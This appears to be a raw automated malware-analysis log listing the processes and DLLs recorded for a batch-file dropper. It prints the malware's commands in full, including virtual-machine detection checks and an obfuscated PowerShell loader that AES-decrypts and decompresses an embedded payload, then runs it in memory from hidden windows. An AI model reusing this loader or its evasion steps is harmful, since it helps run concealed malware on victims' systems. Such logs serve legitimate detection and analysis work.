Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 2424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 2388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
